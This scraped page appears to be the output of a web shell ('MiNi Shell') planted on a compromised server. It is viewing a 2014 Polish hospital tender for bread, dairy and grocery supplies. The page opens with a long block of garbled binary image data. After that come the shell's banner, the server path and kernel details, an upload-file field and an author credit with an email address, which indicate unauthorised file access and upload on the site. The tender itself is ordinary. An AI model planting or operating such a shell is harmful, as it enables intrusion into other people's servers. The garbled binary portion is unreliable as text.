JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140213/50576-N-2014.html

<p class="kh_header"><b>Siemianowice Śląskie: Wykonywanie dla potrzeb Szpitala Miejskiego w Siemianowicach Śląskich Spółka z o. o. dostaw  artykułów spożywczych.</b><br>
<b>Numer ogłoszenia: 50576 - 2014; data zamieszczenia: 13.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Miejski w Siemianowicach Śląskich Spółka z o.o. , ul. 1-go Maja 9, 41-100 Siemianowice Śląskie, woj. śląskie, tel. 32 2281930, faks 32 2281498.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsiemianowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie dla potrzeb Szpitala Miejskiego w Siemianowicach Śląskich Spółka z o. o. dostaw  artykułów spożywczych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Warunki szczegółowe wymagane od Wykonawców:
a)- pakiet nr 1 - odległość piekarni od Zamawiającego maksymalnie 20 km 
b)zapewnienie transportu,
c)termin płatności: 60 dni,
d)miejsce dostawy: kuchenki oddziałowe Pakiet nr 1, magazyn Szpitala Pakiet nr 2 i 3,
2.Dodatkowe wymagania:
Wykonawca ma zagwarantować: 
a)terminowość dostaw: 
-Pakiet nr 1: dostawa 2 razy dziennie w godzinach: rano 7:00 - 7:30 dnia następnego po złożonym zamówieniu, po południu 16:00 - 16:30 w dniu złożenia zamówienia przez 7 dni w tygodniu przez cały okres trwania umowy do kuchenek oddziałowych według przesłanego wraz z zamówieniem rozdzielnika.
-Pakiet nr 2 i 3: do 2 dni roboczych od chwili złożenia zamówienia przez 5 dni w tygodniu przez cały okres trwania umowy
b)zgodność asortymentu dostawy z zamówieniem,
c)dostawę towaru jakościowo odpowiadającego wymogom użytkowym w opakowaniach zapewniających bezpieczny transport i magazynowanie,
d)dostawę towaru od poniedziałku do piątku do magazynu Szpitala Miejskiego w Siemianowicach Śląskich (dotyczy pakietu nr 2 i 3), 
e)realizację reklamacji:
-Pakiet nr 1: dotyczący wad  fizycznych towaru jak również wad jakościowych wynikających z winy Dostawcy lub firmy spedycyjnej występującej w jego imieniu do 1 godziny od momentu stwierdzenia uchybienia potwierdzonego na dowodzie dostawy w obecności Dostawcy (osoby dostarczającej towar).
-Pakiet nr 2 i 3: dotyczących wad fizycznych towaru jak również wad jakościowych wynikających z winy Dostawcy lub firmy spedycyjnej występującej w jego imieniu w przypadku stwierdzenia wadliwości wymianę towaru na wolny od  wad w terminie do 1 dnia od dnia zgłoszenia.
f)realizację dostaw natychmiastowych w szczególnych okolicznościach, których nie można było wcześniej przewidzieć
-Pakiet nr 1: do 1 godziny od chwili złożenia zamówienia faxem, lub e-mail, 
-Pakiet nr 2 i 3 do 24 godzin od chwili złożenia zamówienia faxem, lub e-mail,
g)w odniesieniu wyłącznie do pakietu 3 - termin ważności produktu minimum 12 miesięcy od daty dostawy do Zamawiającego.
PAKIET NR 1 Pieczywo 
Lp.	Nazwa towaru	Opis towaru	Ilość/rok	j.m.
1.Chleb pszenno - żytni (krojony, pakowany) 900g +(- 100g)paczka	Smak: słodko- kwaśny
Zapach: Czysty z właściwym aromatem, niedopuszczalny zapach stęchły i inny obcy.
Konsystencja: miękisz elastyczny, równomiernie porowaty, pory drobne o cienkich ściankach, ściśle przylegający do skórki, bez zakalca i grudek mąki.
Barwa: skóra rumiana, błyszcząca, sprężysta, równomiernie wypieczona bez pęcherzy.	8 400	kg
2.Baton pszenny (krojony, pakowany) 400 g +(- 20 g )paczka	Smak: lekko słodki
Zapach: Czysty z właściwym aromatem, niedopuszczalny zapach stęchły i innych obcych.
Konsystencja: miękisz elastyczny, równomiernie porowaty, pory drobne o cienkich ściankach, ściśle przylegający do skórki, bez zakalca i grudek mąki.
Barwa: skórka równomiernie zabarwiona o odcieniu żółto- złotym.	1920	kg
3.Suchary		36	kg



Szczegółowy opis przedmiotu: 
Wyżej wymienione produkty mają być zgodne z obowiązującymi normami. 
Produkty określone w Pakiecie nr 1 nie mogą pochodzić ze zwrotów.
Chleb ma być krojony o wadze 900 gram paczka i pakowany w folię, z naniesionym terminem przydatności do spożycia maksymalnie 3 dni licząc od dnia wypieku, wg receptury: mąka pszenna (chlebowa) typ 750 60% - 70%, mąka żytnia typ 720 - 30% - 40% , zakwas, drożdże i spełniający wymagania Polskiej Normy PN 93A-74103, oznakowany zgodnie z obowiązującymi przepisami w tym zakresie (nazwa producenta, termin przydatności do spożycia, gramatura). Chleb ma być bez ulepszaczy i konserwantów.
Baton ma być krojony o wadze 400 gram paczka i pakowany w folię, z naniesionym terminem przydatności do spożycia maksymalnie 3 dni licząc od dnia dostawy, spełniający wymagania Polskiej Normy PN-92A-74105, oznakowany zgodnie z obowiązującymi przepisami w tym zakresie (nazwa producenta, termin przydatności do spożycia, gramatura). Baton ma być bez ulepszaczy i konserwantów.

Dostawy mają być realizowane na podstawie zamówień składanych faksowo lub e-mail.
Zamówienia pieczywa dotyczące dostawy w godzinach 7:00 - 7:30 będą składane z jednodniowym wyprzedzeniem do godziny 8:30.
Zamówienia pieczywa dotyczącego dostawy w godzinach 16:00 - 16:30 będą składane do godziny 11:00 dnia w którym ma być dostawa pieczywa. Środek transportu musi odpowiadać warunkom sanitarnym oraz przepisom HACCP. 

PAKIET NR 2 Nabiał
1.Mleko UHT 3,2%	1 500	litry
2.Masło extra 82% tłuszczu 200 g ? 50g	2 000	kg
3.Jajka klasy A	120	szt
4.Jogurt naturalny 200 ml ? 20 ml	15	litr
5.Serek homogenizowany naturalny 125 g ?20g	15	kg

PAKIET NR 3 Artykułu spożywcze - różne
1.Cukier 1 kg	700	kg
2.Kaszka mleczno - ryżowa owocowa 230 g ? 10 g	200	kg
3.Kleik ryżowy 160 g ? 10 g	180	kg
4.Mleko w proszku granulowane odtłuszczone 250 g ? 10 g	10	kg
5.Kawa zbożowa 100 g ? 50g	100	kg
6.Kawa rozpuszczalna 250 g	15	szt.
7.Kawa mielona 250 g	15	szt.
8.Herbata ekspresowa czarna 	40 000	szt.
9.Woda mineralna niegazowana 1,5L	100	szt.
10.Woda mineralna gazowana 1,5L	100	szt.
11.Woda mineralna niegazowana 5L	1000	szt.
12.Sól jodowana, ważona, drobna 1 kg	20	kg.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.10.00-6, 15.81.11.00-7, 15.82.11.50-5, 15.51.12.10-8, 15.83.12.00-4, 15.61.33.00-1, 15.61.40.00-5, 15.84.12.00-7, 15.86.10.00-1, 15.86.41.00-3, 14.43.00.00-4, 15.51.17.00-0, 15.86.00.00-4, 15.55.13.10-1, 03.14.25.00-3, 15.88.10.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie uważany za spełniony, jeżeli Wykonawca potwierdzi jego spełnienie 
w oświadczeniu zgodnie z załącznikiem nr 3 do niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uważany za spełniony jeżeli Wykonawca wykaże, że zrealizował co najmniej trzy dostawy o wartości min. 12 000,00 zł brutto każda, których przedmiotem były dostawy artykułów spożywczych dla pakietu nr 2 i 3, w zakresie pakietu nr 1 dostawy pieczywa. Na potwierdzenie spełnienia warunku Wykonawca dołączy wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie, zgodnie z załącznikiem nr 6 do SIWZ. Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym wyżej mowa, składa stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie uważany za spełniony, jeżeli Wykonawca potwierdzi jego spełnienie w oświadczeniu zgodnie z załącznikiem nr 3 do niniejszej SIWZ. Dodatkowo w zakresie pakietu nr 1 Wykonawca musi wykazać, iż dysponuje piekarnią, w której będzie produkował asortyment wskazany w tym pakiecie dla potrzeb Zamawiającego lub będzie nabywał taki asortyment, zlokalizowaną w odległości nie dalszej niż 20 km od siedziby Zamawiającego - oświadczenie o 
lokalizacji piekarni przeznaczonej do produkcji asortymentu objętego umową dla Zamawiającego stanowi załącznik nr 8 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie uważany za spełniony, jeżeli Wykonawca potwierdzi jego spełnienie w oświadczeniu zgodnie z załącznikiem nr 3 do niniejszej SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">w zakresie pakietu nr 1 - oświadczenie o lokalizacji piekarni przeznaczonej do produkcji asortymentu objętego umową dla Zamawiającego zgodnie z  załącznikiem nr 8 do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-prawidłowo wypełniony formularz ofertowy z wykorzystaniem wzoru - załącznik nr 2 do SIWZ;
-zaakceptowane i podpisane warunki projektu umowy - załącznik nr 4 do SIWZ;
-oświadczenie o zapoznaniu się z warunkami postępowania  - załącznik nr 5 do SIWZ;
-wypełniony formularz cenowy - załącznik nr 7 do SIWZ;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Dostawcy, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego, a także dotyczą: 
-zmiany ilości zamawianego asortymentu przy zachowaniu cen jednostkowych zgodnych z ofertą Dostawcy,
-obniżenia cen netto i brutto w stosunku do cen ofertowych przez Dostawcę, jak również obniżenie wartości netto lub brutto umowy w poszczególnych pakietach,
-zmiany numeru katalogowego produktu lub jego nazwy przy zachowaniu tożsamości dostarczanego produktu i jego cech jakościowych nie gorszych niż produkt zaoferowany w ofercie,
-zmiany danych Stron umowy (np. zmiana siedziby, adresu, nazwy),
-ograniczenia zakresu rzeczowego i wartości umowy w przypadkach działania siły wyższej lub wystąpienia stanu wyższej konieczności,
-ograniczenia zakresu rzeczowego i wartości umowy w przypadkach zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,
-omyłek pisarskich lub błędów rachunkowych,
-mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między Stronami,
-jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego.
2.Dopuszcza się używanie w fakturach określenia dostarczanego towaru zgodnego z systemem komputerowym Dostawcy, o ile pozwala on na ustalenie zgodności dostarczonego asortymentu z zamówieniem i tożsamości produktów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsiemianowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Miejski w Siemianowicach Śląskich Sp. z o.o.
41-100 Siemianowice Śląskie, 
ul. 1-go Maja 9, 
Dział Zamówień Publicznych i Zaopatrzenia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2014 godzina 09:30, miejsce: Szpital Miejski w Siemianowicach Śląskich Sp. z o.o.
41-100 Siemianowice Śląskie, 
ul. 1-go Maja 9, 
Dział Zamówień Publicznych i Zaopatrzenia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chleb pszenno - żytni (krojony, pakowany) 900g +/- 100g/paczka
2	Baton pszenny (krojony, pakowany) 400 g +/- 20 g /paczka
3	Suchary.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.10.00-6, 15.81.11.00-7, 15.82.11.50-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mleko UHT 3,2%
2	Masło extra 82% tłuszczu 200 g ? 50g
3	Jajka klasy A
4	Jogurt naturalny 200 ml ? 20 ml
5	Serek homogenizowany naturalny 125 g ?20g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 18.84.12.00-7, 15.55.13.10-1, 03.14.25.00-3, 15.88.10.00-7, 15.51.12.10-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Artykułu spożywcze - różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Cukier 1 kg
2	Kaszka mleczno - ryżowa owocowa 230 g ? 10 g
3	Kleik ryżowy 160 g ? 10 g
4	Mleko w proszku granulowane odtłuszczone 250 g ? 10 g
5	Kawa zbożowa 100 g ? 50g
6	Kawa rozpuszczalna 250 g
7	Kawa mielona 250 g
8	Herbata ekspresowa czarna 
9	Woda mineralna niegazowana 1,5L
10	Woda mineralna gazowana 1,5L
11	Woda mineralna niegazowana 5L
12	Sól jodowana, ważona, drobna 1 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.61.33.00-1, 15.61.40.00-5, 15.86.10.00-1, 15.83.12.00-4, 15.86.41.00-3, 14.43.00.00-4, 15.51.17.00-0, 15.86.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com